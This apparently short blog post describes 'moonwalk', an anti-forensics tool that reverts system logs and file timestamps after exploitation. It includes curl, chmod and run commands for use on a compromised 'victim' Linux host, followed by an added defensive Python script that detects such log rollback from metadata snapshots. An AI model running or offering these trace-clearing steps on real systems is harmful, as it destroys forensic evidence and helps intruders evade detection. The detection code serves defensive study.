moonwalk
- Thiru T
- Nov 9, 2024
moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.
It saves the state of system logs pre-exploitation and reverts to that state, including the filesystem timestamps, post-exploitation, leaving zero traces of a ghost in the shell.
Install:
curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
Usage:
# Start moonwalk straight after getting a shell on the victim Linux endpoint
curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
chmod +x moonwalk
moonwalk start
# Once you are finished, clear your traces
moonwalk finish
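For defenders, the log and timestamp rollback described above can still show up in file metadata, and the following added example (not part of the original post or of the moonwalk project) compares two metadata snapshots of log files and flags files that moved "backward". The names Meta, snapshot and find_rollbacks are hypothetical, the sample values are constructed, and the check assumes snapshots are stored off the monitored host.

```python
import os
from typing import NamedTuple

class Meta(NamedTuple):  # hypothetical record of one file's metadata
    inode: int
    size: int
    mtime_ns: int
    ctime_ns: int

def snapshot(paths):
    """Stat each log file; keep results off-host so they cannot be reverted too."""
    out = {}
    for p in paths:
        try:
            st = os.stat(p)
        except FileNotFoundError:
            continue
        out[p] = Meta(st.st_ino, st.st_size, st.st_mtime_ns, st.st_ctime_ns)
    return out

def find_rollbacks(prev, curr):
    """Return {path: [reasons]} for files whose metadata moved 'backward'."""
    findings = {}
    for path, old in prev.items():
        new = curr.get(path)
        if new is None or new.inode != old.inode:
            continue  # removed, rotated or recreated: out of scope here
        reasons = []
        if new.size < old.size:  # (copytruncate rotation also triggers this)
            reasons.append("size shrank on same inode")
        if new.mtime_ns < old.mtime_ns:
            reasons.append("mtime moved backward")
        # Linux sets ctime to "now" on any metadata change, and utimes cannot set it
        if new.ctime_ns > old.ctime_ns and new.mtime_ns <= old.mtime_ns:
            reasons.append("ctime advanced but mtime did not")
        if reasons:
            findings[path] = reasons
    return findings

# Constructed sample snapshots (illustrative values, not real data)
PREV = {"/var/log/auth.log": Meta(1001, 5000, 500, 500),
        "/var/log/syslog": Meta(1002, 9000, 600, 600),
        "/var/log/wtmp": Meta(1003, 3840, 100, 100)}
CURR = {"/var/log/auth.log": Meta(1001, 4200, 200, 900),   # reverted
        "/var/log/syslog": Meta(1002, 9500, 800, 800),     # normal growth
        "/var/log/wtmp": Meta(1003, 3840, 100, 950)}       # metadata touched
if __name__ == "__main__":
    for path, reasons in find_rollbacks(PREV, CURR).items():
        print(path, "->", "; ".join(reasons))
```

The ctime check is a heuristic: a chmod or chown on a log file also advances ctime without touching mtime, so treat a hit as a lead to correlate with remotely forwarded logs.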
